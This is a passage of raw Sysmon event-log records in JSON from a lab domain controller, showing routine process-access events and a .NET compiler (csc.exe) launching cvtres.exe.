C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.793\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010AA2F0800}\r\nProcessId: 1364\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESE825.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCC286BCD0C07E41C3BE279F4DF3F94E74.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nParentProcessId: 4804\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\irfs1o1h.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.793","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010AA2F0800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESE825.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCC286BCD0C07E41C3BE279F4DF3F94E74.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","ParentProcessId":"4804","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\irfs1o1h.cmdline\"","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nSourceProcessId: 4804\r\nSourceThreadId: 4492\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010AA2F0800}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","SourceProcessId":"4804","SourceThreadId":"4492","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010AA2F0800}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010AA2F0800}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010AA2F0800}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.791","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.791\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 